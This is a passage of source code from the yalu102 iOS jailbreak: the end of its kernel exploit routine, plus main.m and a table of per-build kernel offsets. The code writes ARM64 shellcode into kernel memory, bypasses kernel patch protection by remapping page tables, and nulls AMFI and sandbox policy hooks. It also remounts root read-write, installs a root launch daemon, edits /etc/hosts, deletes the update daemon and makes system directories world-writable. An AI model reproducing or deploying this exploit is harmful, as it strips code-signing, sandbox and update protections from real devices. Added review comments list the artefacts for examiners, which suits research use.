    WriteAnywhere32(shc+8, 0xd508871f); // tlbi vmalle1
    WriteAnywhere32(shc+12, 0xd5033fdf); // isb
    WriteAnywhere32(shc+16, 0xd5033f9f); // dsb sy
    WriteAnywhere32(shc+20, 0xd5033b9f); // dsb ish
    WriteAnywhere32(shc+24, 0xd5033fdf); // isb
    WriteAnywhere32(shc+28, 0x5800007e); // ldr x30, 8
    WriteAnywhere32(shc+32, 0xd65f03c0); // ret
    WriteAnywhere64(shc+40, regi);
    WriteAnywhere64(shc+48, /* new ttbr1 */ physp);

    shc+=0x100;
    WriteAnywhere32(shc, 0x5800019e); // ldr x30, #40
    WriteAnywhere32(shc+4, 0xd518203e); // msr ttbr1_el1, x30
    WriteAnywhere32(shc+8, 0xd508871f); // tlbi vmalle1
    WriteAnywhere32(shc+12, 0xd5033fdf); // isb
    WriteAnywhere32(shc+16, 0xd5033f9f); // dsb sy
    WriteAnywhere32(shc+20, 0xd5033b9f); // dsb ish
    WriteAnywhere32(shc+24, 0xd5033fdf); // isb
    WriteAnywhere32(shc+28, 0x5800007e); // ldr x30, 8
    WriteAnywhere32(shc+32, 0xd65f03c0); // ret
    WriteAnywhere64(shc+40, regd); /*handle deepsleep*/
    WriteAnywhere64(shc+48, /* new ttbr1 */ physp);
    shc-=0x100;
    {
        // Sequence at shc+0x200; the AMFI patch near the end of this function
        // branches here ("amfi shellcode").
        int n = 0;
        WriteAnywhere32(shc+0x200+n, 0x18000148); n+=4; // ldr w8, 0x28
        WriteAnywhere32(shc+0x200+n, 0xb90002e8); n+=4; // str w8, [x23]
        WriteAnywhere32(shc+0x200+n, 0xaa1f03e0); n+=4; // mov x0, xzr
        WriteAnywhere32(shc+0x200+n, 0xd10103bf); n+=4; // sub sp, x29, #64
        WriteAnywhere32(shc+0x200+n, 0xa9447bfd); n+=4; // ldp x29, x30, [sp, #64]
        WriteAnywhere32(shc+0x200+n, 0xa9434ff4); n+=4; // ldp x20, x19, [sp, #48]
        WriteAnywhere32(shc+0x200+n, 0xa94257f6); n+=4; // ldp x22, x21, [sp, #32]
        WriteAnywhere32(shc+0x200+n, 0xa9415ff8); n+=4; // ldp x24, x23, [sp, #16]
        WriteAnywhere32(shc+0x200+n, 0xa8c567fa); n+=4; // ldp x26, x25, [sp], #80
        WriteAnywhere32(shc+0x200+n, 0xd65f03c0); n+=4; // ret
        WriteAnywhere32(shc+0x200+n, 0x0e00400f); n+=4; // tbl.8b v15, { v0, v1, v2 }, v0

    }

    // The region is switched to read+execute once it has been filled.
    mach_vm_protect(tfp0, shc, 0x4000, 0, VM_PROT_READ|VM_PROT_EXECUTE);

    vm_address_t kppsh = 0;
    mach_vm_allocate(tfp0, &kppsh, 0x4000, VM_FLAGS_ANYWHERE);

    {
        // Sequence that performs the CPACR_EL1 write with the original table
        // address (read from ttbr0_real) in TTBR1_EL1, then loads physp again.
        int n = 0;

        WriteAnywhere32(kppsh+n, 0x580001e1); n+=4; // ldr x1, #60
        WriteAnywhere32(kppsh+n, 0x58000140); n+=4; // ldr x0, #40
        WriteAnywhere32(kppsh+n, 0xd5182020); n+=4; // msr TTBR1_EL1, x0
        WriteAnywhere32(kppsh+n, 0xd2a00600); n+=4; // movz x0, #0x30, lsl #16
        WriteAnywhere32(kppsh+n, 0xd5181040); n+=4; // msr CPACR_EL1, x0
        WriteAnywhere32(kppsh+n, 0xd5182021); n+=4; // msr TTBR1_EL1, x1
        WriteAnywhere32(kppsh+n, 0x10ffffe0); n+=4; // adr x0, #-4
        WriteAnywhere32(kppsh+n, 0xd503201f); n+=4; // nop
        WriteAnywhere32(kppsh+n, isvad ? 0xd508871f : 0xd508873e); n+=4; // tlbi vmalle1 (4k) / tlbi vae1, x30 (16k)
        WriteAnywhere32(kppsh+n, 0xd5033fdf); n+=4; // isb
        WriteAnywhere32(kppsh+n, 0xd65f03c0); n+=4; // ret
        WriteAnywhere64(kppsh+n, ReadAnywhere64(ttbr0_real)); n+=8;
        WriteAnywhere64(kppsh+n, physp); n+=8;
        WriteAnywhere64(kppsh+n, physp); n+=8;
    }

    mach_vm_protect(tfp0, kppsh, 0x4000, 0, VM_PROT_READ|VM_PROT_EXECUTE);

    // Fill in the two literals of each trampoline: the physical address of the
    // matching shc sequence and the handler address to continue at.
    WriteAnywhere64(shellcode + 0x100 + 0x10, shc - gVirtBase + gPhysBase); // idle
    WriteAnywhere64(shellcode + 0x200 + 0x10, shc + 0x100 - gVirtBase + gPhysBase); // idle

    WriteAnywhere64(shellcode + 0x100 + 0x18, idlesleep_handler - gVirtBase + gPhysBase + 8); // idlehandler
    WriteAnywhere64(shellcode + 0x200 + 0x18, idlesleep_handler - gVirtBase + gPhysBase + 8); // deephandler

    /*

     pagetables are now not real anymore, they're real af

     */

    /* ---- Stage 5: patch code and policy tables through remapped pages ---- */
    // Find the first 0xd5181040 word (msr CPACR_EL1, x0 per the comment above)
    // in the local copy of __TEXT_EXEC.
    int cpacr_idx = 0;
    uint32_t* opps = gadget_base - min + kdump;

    while (1) {
        if (opps[cpacr_idx] == 0xd5181040) {
            NSLog(@"got a cpacr");
            break;
        }
        cpacr_idx++;
    }
// Page size and page-offset mask for the configuration selected by isvad.
#define PSZ (isvad ? 0x1000 : 0x4000)
#define PMK (PSZ-1)


// RemapPage_(address): for the table entry that pagestuff_64 reports for the
// page, split a block entry into a table of page entries if necessary, copy the
// referenced page into a fresh allocation, point the entry at the copy and
// clear its UXN and PXN attributes. The original physical page is left as it
// was; only the copy is modified by the writes that follow.
#define RemapPage_(address) \
    pagestuff_64((address) & (~PMK), ^(vm_address_t tte_addr, int addr) {\
        uint64_t tte = ReadAnywhere64(tte_addr);\
        if (!(TTE_GET(tte, TTE_IS_TABLE_MASK))) {\
            NSLog(@"breakup!");\
            uint64_t fakep = physalloc(PSZ);\
            uint64_t realp = TTE_GET(tte, TTE_PHYS_VALUE_MASK);\
            TTE_SETB(tte, TTE_IS_TABLE_MASK);\
            for (int i = 0; i < PSZ/8; i++) {\
                TTE_SET(tte, TTE_PHYS_VALUE_MASK, realp + i * PSZ);\
                WriteAnywhere64(fakep+i*8, tte);\
            }\
            TTE_SET(tte, TTE_PHYS_VALUE_MASK, findphys_real(fakep));\
            WriteAnywhere64(tte_addr, tte);\
        }\
        uint64_t newt = physalloc(PSZ);\
        copyin(bbuf, TTE_GET(tte, TTE_PHYS_VALUE_MASK) - gPhysBase + gVirtBase, PSZ);\
        copyout(newt, bbuf, PSZ);\
        TTE_SET(tte, TTE_PHYS_VALUE_MASK, findphys_real(newt));\
        TTE_SET(tte, TTE_BLOCK_ATTR_UXN_MASK, 0);\
        TTE_SET(tte, TTE_BLOCK_ATTR_PXN_MASK, 0);\
        WriteAnywhere64(tte_addr, tte);\
        NSLog(@"level %llx - %llx", tte_addr, TTE_GET(tte, TTE_PHYS_VALUE_MASK));\
    }, level1_table, isvad ? 1 : 2);

// NewPointer(origptr): address at which the remapped copy of origptr's page can
// be written (physical address of the copy converted back to a virtual address).
#define NewPointer(origptr) (((origptr) & PMK) | findphys_real(origptr) - gPhysBase + gVirtBase)

    // Pages that have already been remapped, so each is copied only once.
    // NOTE(review): capacity is 512 entries and remapcnt is never checked against it.
    uint64_t* remappage = calloc(512, 8);

    int remapcnt = 0;


// RemapPage(x): remap the page containing x and the page after it, unless the
// page is already recorded in remappage.
#define RemapPage(x)\
    {\
        int fail = 0;\
        for (int i = 0; i < remapcnt; i++) {\
            if (remappage[i] == (x & (~PMK))) {\
                fail = 1;\
            }\
        }\
        if (fail == 0) {\
            RemapPage_(x);\
            RemapPage_(x+PSZ);\
            remappage[remapcnt++] = (x & (~PMK));\
        }\
    }

    // From here on the page-table walks start at the duplicated table.
    level1_table = physp - gPhysBase + gVirtBase;
    WriteAnywhere64(ReadAnywhere64(pmap_store), level1_table);


    // Replace the CPACR_EL1 write found above with a branch-with-link to the
    // space right after the kernel's load commands, and place there a two-word
    // stub that jumps to kppsh.
    uint64_t shtramp = kernbase + mh_kern->sizeofcmds + sizeof(struct mach_header_64);
    RemapPage(gadget_base + cpacr_idx*4);
    WriteAnywhere32(NewPointer(gadget_base + cpacr_idx*4), 0x94000000 | (((shtramp - (gadget_base+cpacr_idx*4))/4) & 0x3FFFFFF));

    RemapPage(shtramp);
    WriteAnywhere32(NewPointer(shtramp), 0x58000041);
    WriteAnywhere32(NewPointer(shtramp)+4, 0xd61f0020);
    WriteAnywhere64(NewPointer(shtramp)+8, kppsh);

    // Store the value from find_lwvm_mapio_newj() at the location from
    // find_lwvm_mapio_patch(); what that changes is decided inside the patchfinder.
    uint64_t lwvm_write = find_lwvm_mapio_patch();
    uint64_t lwvm_value = find_lwvm_mapio_newj();
    RemapPage(lwvm_write);
    WriteAnywhere64(NewPointer(lwvm_write), lwvm_value);


    uint64_t kernvers = (uint8_t*)memmem(whole_dump, (size_t)whole_size, "Darwin Kernel Version", strlen("Darwin Kernel Version")) - whole_dump;
    uint64_t release = (uint8_t*)memmem(whole_dump, (size_t)whole_size, "RELEASE_ARM", strlen("RELEASE_ARM")) - whole_dump;

    // Marker word just before the version string. It is written to the remapped
    // copy only; the wait loop further down polls the ordinary address until
    // the same value is visible there.
    RemapPage(kernvers+whole_base-4);
    WriteAnywhere32(NewPointer(kernvers+whole_base-4), 1);

    // The kernel version text is changed from "RELEASE_ARM" to "MarijuanARM",
    // but only when all 11 bytes lie in one contiguous remapped range.
    // Detection note: this string then shows up in uname() output, and
    // constload() in devicesupport.m tests for it.
    RemapPage(release+whole_base);
    if (NewPointer(release+whole_base) == (NewPointer(release+whole_base+11) - 11)) {
        copyout(NewPointer(release+whole_base), "MarijuanARM", 11); /* marijuanarm */
    }

    // AMFI's memcmp stub pointer is replaced with the address returned by
    // find_ret_0(); presumably every comparison made through the stub then
    // reports "equal" (confirm against the patchfinder).
    uint64_t memcmp_got = find_amfi_memcmpstub();
    uint64_t ret1 = find_ret_0();

    RemapPage(memcmp_got);
    WriteAnywhere64(NewPointer(memcmp_got), ret1);

    uint64_t fref = find_reference((uint32_t*)get_data_for_mode(0, SearchTextExec), text_exec_size, text_exec_base, idlesleep_handler+0xC) + text_exec_base;
    NSLog(@"fref at %llx", fref);

    // Locate a 64-bit pointer to the "Apple Mobile File Integrity" string in
    // the copy and take the pointer stored 0x18 bytes after it as the address
    // of AMFI's policy operations table.
    uint64_t find_string_reference(char* string, enum Search mode);
    uint64_t amfiops = 0;
    //= find_string_reference("Apple Mobile File Integrity", SearchPrelinkExec);
    char* sbstr = memmem(whole_dump, whole_size, "Apple Mobile File Integrity", strlen("Apple Mobile File Integrity"));
    for (int i = 0; i < whole_size/8; i++) {
        if (*(uint64_t*)(whole_dump+i*8) == (sbstr - (uint64_t)whole_dump + whole_base)) {
            amfiops = *(uint64_t*)(whole_dump+i*8+0x18);
            break;
        }
    }

    NSLog(@"amfistr at %llx", amfiops);


    {
        /*
         amfi
         */

        // Clears the mpo_file_check_mmap slot of the table found above.
        uint64_t sbops = amfiops;
        uint64_t sbops_end = sbops + sizeof(struct mac_policy_ops);

        uint64_t nopag = sbops_end - sbops; // table size in bytes

        int ctr = 0; // unused
        for (int i = 0; i < nopag; i+= PSZ) {
            RemapPage(((sbops + i) & (~PMK)));
        }
        WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_file_check_mmap)), 0);
    }


    /*
     first str
     */
    // Walk forward from fref to the next word matching the 0xF9000000 pattern
    // (a store, per the "str" comments), compute the address it stores to and
    // write physcode+0x200 (the deepsleep trampoline) there.
    while (1) {
        uint32_t opcode = ReadAnywhere32(fref);
        if ((opcode & 0xFFC00000) == 0xF9000000) {
            int32_t outhere = ((opcode & 0x3FFC00) >> 10) * 8;
            int32_t myreg = (opcode >> 5) & 0x1f;
            uint64_t rgz = find_register_value((uint32_t*)get_data_for_mode(0, SearchTextExec), fref-gadget_base, text_exec_base, myreg)+outhere;


            WriteAnywhere64(rgz, physcode+0x200);
            break;
        }
        fref += 4;
    }

    fref += 4;

    /*
     second str
     */
    // Same search for the following store; its target receives physcode+0x100
    // (the idlesleep trampoline).
    while (1) {
        uint32_t opcode = ReadAnywhere32(fref);
        if ((opcode & 0xFFC00000) == 0xF9000000) {
            int32_t outhere = ((opcode & 0x3FFC00) >> 10) * 8;
            int32_t myreg = (opcode >> 5) & 0x1f;
            uint64_t rgz = find_register_value((uint32_t*)get_data_for_mode(0, SearchTextExec), fref-gadget_base, text_exec_base, myreg)+outhere;

            WriteAnywhere64(rgz, physcode+0x100);
            break;
        }
        fref += 4;
    }





    {
        /*
         sandbox
         */

        // Every slot written below is set to 0 in the table returned by
        // find_sbops(). The slot names are fields of struct mac_policy_ops
        // (devicesupport.h); a cleared slot presumably means that policy is no
        // longer consulted for the operation. mpo_vnode_check_rename and
        // mpo_vnode_check_setutimes are each written twice, which is redundant.
        uint64_t sbops = find_sbops();
        uint64_t sbops_end = sbops + sizeof(struct mac_policy_ops) + PMK;

        uint64_t nopag = (sbops_end - sbops)/(PSZ); // pages spanned by the table, rounded up

        int ctr = 0; // unused
        for (int i = 0; i < nopag; i++) {
            RemapPage(((sbops + i*(PSZ)) & (~PMK)));
        }

        WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_file_check_mmap)), 0);
        WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_rename)), 0);
        WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_rename)), 0);
        WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_access)), 0);
        WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_chroot)), 0);
        WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_create)), 0);
        WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_deleteextattr)), 0);
        WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_exchangedata)), 0);
        WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_exec)), 0);
        WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_getattrlist)), 0);
        WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_getextattr)), 0);
        WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_ioctl)), 0);
        WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_link)), 0);
        WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_listextattr)), 0);
        WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_open)), 0);
        WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_readlink)), 0);
        WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_setattrlist)), 0);
        WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_setextattr)), 0);
        WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_setflags)), 0);
        WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_setmode)), 0);
        WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_setowner)), 0);
        WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_setutimes)), 0);
        WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_setutimes)), 0);
        WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_stat)), 0);
        WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_truncate)), 0);
        WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_unlink)), 0);
        WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_notify_create)), 0);
        WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_fsgetpath)), 0);
        WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_getattr)), 0);
        WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_mount_check_stat)), 0);

    }

    {
        // Overwrite the code 0x18 bytes before the address from find_amfiret()
        // with a two-word stub that jumps to the sequence at shc+0x200.
        uint64_t point = find_amfiret()-0x18;

        RemapPage((point & (~PMK)));
        uint64_t remap = NewPointer(point);

        // The remapped copy must still hold the same word as the original.
        assert(ReadAnywhere32(point) == ReadAnywhere32(remap));

        WriteAnywhere32(remap, 0x58000041);
        WriteAnywhere32(remap + 4, 0xd61f0020);
        WriteAnywhere64(remap + 8, shc+0x200); /* amfi shellcode */

    }

    // Point every recorded per-CPU slot at the idlesleep trampoline.
    for (int i = 0; i < z; i++) {
        WriteAnywhere64(plist[i], physcode + 0x100);
    }

    // Wait until the marker written through the remapped page is visible at the
    // ordinary address, presumably once a CPU has passed through the trampoline
    // and switched to the duplicated tables.
    while (ReadAnywhere32(kernvers+whole_base-4) != 1) {
        sleep(1);
    }

    NSLog(@"enabled patches");

    /* ---- Stage 6: remount "/", install files, load the launch daemon ---- */
    {
        // mount patch
        // Temporarily clears bit 6 of the 32-bit value at v_mount+0x71 (read
        // into v_flag), updates the "/" mount with MNT_UPDATE, then writes the
        // saved value back.
        extern uint64_t rootvnode_offset;
        uint64_t rootfs_vnode = ReadAnywhere64(rootvnode_offset + kernbase);

        struct utsname uts;
        uname(&uts);

        // Offset of the mount pointer inside the vnode; 0xd0 when the version
        // string contains "16.0.0", 0xd8 otherwise.
        vm_offset_t off = 0xd8;
        if (strstr(uts.version, "16.0.0")) {
            off = 0xd0;
        }

        uint64_t v_mount = ReadAnywhere64(rootfs_vnode+off);

        uint32_t v_flag = ReadAnywhere32(v_mount + 0x71);

        WriteAnywhere32(v_mount + 0x71, v_flag & (~(0x1<<6)));

        char* nmz = strdup("/dev/disk0s1s1");
        int lolr = mount( "hfs", "/", MNT_UPDATE, (void*)&nmz);
        NSLog(@"remounting: %d", lolr);

        v_mount = ReadAnywhere64(rootfs_vnode+off);

        WriteAnywhere32(v_mount + 0x71, v_flag);
    }

    /*
     * File-system changes made below. For an examiner these are the host
     * artefacts this tool leaves behind:
     *   - /.installed_yaluX and /.cydia_no_stash are created;
     *   - /bin/tar (mode 0777) and /bin/launchctl are replaced with copies
     *     from the app bundle, and bootstrap.tar is unpacked at "/";
     *   - /usr/libexec/reload and /Library/LaunchDaemons/0.reload.plist are
     *     installed, owned by uid 0 / gid 0;
     *   - /etc/hosts gains 127.0.0.1 entries for iphonesubmissions.apple.com
     *     and radarsubmissions.apple.com;
     *   - SBShowNonDefaultSystemApps is set in the SpringBoard preferences;
     *   - /System/Library/LaunchDaemons/com.apple.mobile.softwareupdated.plist
     *     is deleted;
     *   - /private, /private/var, /private/var/mobile and two directories
     *     below it are made world-writable (0777), which weakens file
     *     protection for every process on the device.
     */
    {
        char path[256];
        uint32_t size = sizeof(path);
        _NSGetExecutablePath(path, &size);
        char* pt = realpath(path, 0);

        {
            __block pid_t pd = 0;
            NSString* execpath = [[NSString stringWithUTF8String:pt] stringByDeletingLastPathComponent];


            // The marker file decides whether the one-time bootstrap runs.
            // NOTE(review): the descriptor is never closed.
            int f = open("/.installed_yaluX", O_RDONLY);

            if (f == -1) {
                NSString* tar = [execpath stringByAppendingPathComponent:@"tar"];
                NSString* bootstrap = [execpath stringByAppendingPathComponent:@"bootstrap.tar"];
                const char* jl = [tar UTF8String];

                unlink("/bin/tar");
                unlink("/bin/launchctl");

                copyfile(jl, "/bin/tar", 0, COPYFILE_ALL);
                chmod("/bin/tar", 0777);
                jl="/bin/tar"; //

                chdir("/");

                // Unpack the bundled archive at the file-system root.
                posix_spawn(&pd, jl, 0, 0, (char**)&(const char*[]){jl, "--preserve-permissions", "-xvf", [bootstrap UTF8String], NULL}, NULL);
                NSLog(@"pid = %x", pd);
                waitpid(pd, 0, 0);


                NSString* jlaunchctl = [execpath stringByAppendingPathComponent:@"launchctl"];
                jl = [jlaunchctl UTF8String];

                copyfile(jl, "/bin/launchctl", 0, COPYFILE_ALL);
                chmod("/bin/launchctl", 0755);

                // NOTE(review): O_CREAT without a mode argument leaves the new
                // files' permissions undefined, and both descriptors leak.
                open("/.installed_yaluX", O_RDWR|O_CREAT);
                open("/.cydia_no_stash",O_RDWR|O_CREAT);


                system("echo '127.0.0.1 iphonesubmissions.apple.com' >> /etc/hosts");
                system("echo '127.0.0.1 radarsubmissions.apple.com' >> /etc/hosts");

                system("/usr/bin/uicache");

                // cfprefsd is stopped while the plist is rewritten on disk and
                // killed afterwards.
                system("killall -SIGSTOP cfprefsd");
                NSMutableDictionary* md = [[NSMutableDictionary alloc] initWithContentsOfFile:@"/var/mobile/Library/Preferences/com.apple.springboard.plist"];

                [md setObject:[NSNumber numberWithBool:YES] forKey:@"SBShowNonDefaultSystemApps"];

                [md writeToFile:@"/var/mobile/Library/Preferences/com.apple.springboard.plist" atomically:YES];
                system("killall -9 cfprefsd");

            }
            {
                // Installed on every run, not only the first.
                NSString* jlaunchctl = [execpath stringByAppendingPathComponent:@"reload"];
                char* jl = [jlaunchctl UTF8String];
                unlink("/usr/libexec/reload");
                copyfile(jl, "/usr/libexec/reload", 0, COPYFILE_ALL);
                chmod("/usr/libexec/reload", 0755);
                chown("/usr/libexec/reload", 0, 0);

            }
            {
                // Installed on every run, not only the first.
                NSString* jlaunchctl = [execpath stringByAppendingPathComponent:@"0.reload.plist"];
                char* jl = [jlaunchctl UTF8String];
                unlink("/Library/LaunchDaemons/0.reload.plist");
                copyfile(jl, "/Library/LaunchDaemons/0.reload.plist", 0, COPYFILE_ALL);
                chmod("/Library/LaunchDaemons/0.reload.plist", 0644);
                chown("/Library/LaunchDaemons/0.reload.plist", 0, 0);
            }
            unlink("/System/Library/LaunchDaemons/com.apple.mobile.softwareupdated.plist");

        }
    }
    chmod("/private", 0777);
    chmod("/private/var", 0777);
    chmod("/private/var/mobile", 0777);
    chmod("/private/var/mobile/Library", 0777);
    chmod("/private/var/mobile/Library/Preferences", 0777);

    // The daemon load runs in a background shell; the credential pointer saved
    // at the start is then restored for this process.
    system("(echo 'really jailbroken'; /bin/launchctl load /Library/LaunchDaemons/0.reload.plist)&");
    WriteAnywhere64(bsd_task+0x100, orig_cred);
    sleep(2);

    NSLog(@"done");
}

--------------------------------------------------------------------------------
/SourceCode/yalu102/launchctl:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/SourceCode/yalu102/launchctl
--------------------------------------------------------------------------------
/SourceCode/yalu102/main.m:
--------------------------------------------------------------------------------
//
// main.m
// yalu102
//
// Created by qwertyoruiop on 05/01/2017.
// Copyright © 2017 kimjongcracks. All rights reserved.
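//

// NOTE(review): the header name after #import was lost when this page was
// extracted; UIKit is what UIApplicationMain needs. Confirm against the repository.
#import <UIKit/UIKit.h>
#import "AppDelegate.h"

// Application entry point: hands control to UIKit with AppDelegate as the
// application delegate class.
int main(int argc, char * argv[]) {
    @autoreleasepool {
        return UIApplicationMain(argc, argv, nil, NSStringFromClass([AppDelegate class]));
    }
}

--------------------------------------------------------------------------------
/SourceCode/yalu102/offsets.c:
--------------------------------------------------------------------------------
/*
 * NOTE(review): the four system header names were stripped from this page.
 * The four below are the ones the code in this file demonstrably needs
 * (uint64_t, printf, strcmp, uname); confirm against the repository.
 */
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/utsname.h>

#include "offsets.h"

uint64_t allproc_offset;
uint64_t kernproc_offset;   /* defined here but never assigned by init_offsets() */
uint64_t procoff;
uint64_t rootvnode_offset;

/*
 * One row per recognised kernel build: the exact uname() version string and
 * the two offsets that vary between builds. The trailing remarks are the
 * original author's.
 *
 * Offsets shared by:
 * - @qwertyoruiop
 * - @Mila432
 * - @Andywiik
 * - @nicogibbons
 * - @jtv7
 * - @onchehuh
 */
struct kernel_build_offsets {
    const char *version;
    uint64_t allproc;
    uint64_t rootvnode;
};

static const struct kernel_build_offsets known_builds[] = {
    { "Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:09 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_T7001", 0x5b8528, 0x5be0b8 },
    { "Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:08 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_T7000", 0x5b8468, 0x5be0b8 },
    { "Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:09 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_S8000", 0x5a8438, 0x5ae0b8 },
    { "Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:09 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_S5L8960X", 0x5ac418, 0x5b20b8 },
    { "Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:08 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_T8010", 0x5ec478, 0x5f20b8 },
    { "Darwin Kernel Version 16.3.0: Mon Dec 19 19:56:48 PST 2016; root:xnu-3789.43.2~1/RELEASE_ARM64_T7000", 0x5b8468, 0x5be0b8 }, /* apple tv 4 */
    { "Darwin Kernel Version 16.3.0: Tue Nov 29 20:25:47 PST 2016; root:xnu-3789.33.1~1/RELEASE_ARM64_T7000", 0x5b8468, 0x5be0b8 }, /* apple tv 4 */
    { "Darwin Kernel Version 16.1.0: Thu Sep 29 22:13:19 PDT 2016; root:xnu-3789.23.3~2/RELEASE_ARM64_T7000", 0x5b4168, 0x5ba0b8 }, /* apple tv 4 */
    { "Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:10 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_T8010", 0x5ec178, 0x5f20b8 },
    { "Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:12 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_T7001", 0x5b4228, 0x5ba0b8 },
    { "Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:11 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_T7000", 0x5b4168, 0x5ba0b8 },
    { "Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:12 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_S8000", 0x5a4148, 0x5aa0b8 },
    { "Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:11 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_S5L8960X", 0x5a4128, 0x5aa0b8 },
    { "Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:54 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_T8010", 0x5ec178, 0x5f20b8 },
    { "Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:54 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_T7001", 0x5b0228, 0x5b60b8 },
    { "Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:55 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_T7000", 0x5b0168, 0x5b60b8 },
    { "Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:54 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_S8000", 0x5a4148, 0x5aa0b8 },
    { "Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:55 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_S5L8960X", 0x5a4128, 0x5aa0b8 },
    /* NOTE(review): whitespace on this page is collapsed, so the spacing
     * around the single-digit day below may differ from the repository;
     * strcmp() needs it exact. */
    { "Darwin Kernel Version 16.0.0: Fri Aug 5 22:15:30 PDT 2016; root:xnu-3789.1.24~11/RELEASE_ARM64_S5L8960X", 0x5a4128, 0x5aa0b8 }, /* some beta ios */
};

/*
 * Fill in the global offsets for the running kernel.
 *
 * Prints the uname() fields, loads a default set of offsets, then overrides
 * allproc_offset and rootvnode_offset when the version string matches a row
 * of known_builds exactly. procoff is the same (0x360) for every build.
 *
 * No status is returned: on an unrecognised kernel the function only prints
 * a warning and leaves the defaults in place, so the caller cannot tell that
 * the offsets do not belong to the running build.
 * NOTE(review): a status return would let the caller stop instead.
 */
void init_offsets() {
    struct utsname u = { 0 };
    /* Return value is not checked; if uname() fails, u stays zeroed and no
     * row matches. */
    uname(&u);

    printf("sysname: %s\n", u.sysname);
    printf("nodename: %s\n", u.nodename);
    printf("release: %s\n", u.release);
    printf("version: %s\n", u.version);
    printf("machine: %s\n", u.machine);

    /* Defaults, kept when no row matches. */
    allproc_offset = 0x5a4148;
    procoff = 0x360;
    rootvnode_offset = 0x5aa0b8;

    for (size_t i = 0; i < sizeof(known_builds) / sizeof(known_builds[0]); i++) {
        if (strcmp(u.version, known_builds[i].version) == 0) {
            allproc_offset = known_builds[i].allproc;
            rootvnode_offset = known_builds[i].rootvnode;
            return;
        }
    }

    printf("missing offset, prob crashing\n");
}
--------------------------------------------------------------------------------
/SourceCode/yalu102/offsets.h:
--------------------------------------------------------------------------------
#ifndef offsets_h
#define offsets_h

// NOTE(review): the header name after #import was lost in extraction; the
// declarations below need uint64_t, which <stdint.h> provides. Confirm
// against the repository.
#import <stdint.h>

// offsets from the main kernel 0xfeedfacf
extern uint64_t allproc_offset;
extern uint64_t kernproc_offset;

// offsets in struct proc
extern uint64_t struct_proc_p_pid_offset;
extern uint64_t struct_proc_task_offset;
extern uint64_t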
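struct_proc_p_uthlist_offset;
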